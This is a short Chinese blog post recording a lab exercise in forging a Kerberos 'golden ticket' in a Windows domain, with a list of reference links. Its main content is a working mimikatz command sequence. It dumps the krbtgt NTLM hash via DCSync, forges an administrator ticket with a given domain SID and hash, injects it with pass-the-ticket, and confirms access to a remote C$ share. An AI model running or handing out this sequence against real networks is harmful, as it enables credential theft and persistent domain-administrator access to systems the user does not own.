域内渗透–黄金票据

  • by

黄金票据是要具有域控权限,拿到krbtgt用户的hash等条件,相对而言条件较苛刻

本次是成功了得

也不确定是否都是关于这方面的文章,全放出来,参考:

https://klionsec.github.io/2016/08/10/ntlm-kerberos/  深刻理解windows安全认证机制 [ntlm & Kerberos]
https://wh0ale.github.io/2018/12/25/2018-12-25-%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E7%A5%A8%E6%8D%AE/
http://www.vuln.cn/6699
https://blog.csdn.net/qq_36119192/article/details/92843080
http://www.moonsec.com/post-568.html
https://www.52os.net/articles/ms14-068-CVE-2014-6324-howto.html
https://blog.yuntest.org/jszy/7838.html
https://wh0ale.github.io/2018/12/25/2018-12-25-%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E7%A5%A8%E6%8D%AE/
https://www.cnblogs.com/KevinGeorge/p/9099373.html
https://xz.aliyun.com/t/2527
https://www.jianshu.com/p/a3ddd7502c09
http://www.hetianlab.com/html/news/news-2016082601.html
https://1sparrow.com/2018/02/19/%E5%9F%9F%E6%B8%97%E9%80%8F%E7%9B%B8%E5%85%B3/
https://www.freebuf.com/sectool/112594.html
http://www.vuln.cn/6743
https://blog.csdn.net/pyphrb/article/details/52051321
https://github.com/gentilkiwi/mimikatz
https://wh0ale.github.io/2018/12/25/2018-12-25-%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E7%A5%A8%E6%8D%AE/

正式实验:

1.Windows提高进程权限至Debug
privilege::debug
2.获取krbtgt 的ntlm hash
lsadump::dcsync /domain:pentestlab.local /all /csv
用lsadump::lsa /patch命令 在windows2012中会崩溃

3.清理缓存证书
kerberos::purge

3.测试
生产黄金票据:
kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-240842785-701863807-1442391399 /krbtgt:ee63ff54d1a75437d1db763ceefd9b71 /ticket:chocolate.kirbi
注入进程:
kerberos::ptt chocolate.kirbi
测试成功:
dir \\Win-gu9sgoktm58\c$

2019.8.27

发表评论

电子邮件地址不会被公开。 必填项已用*标注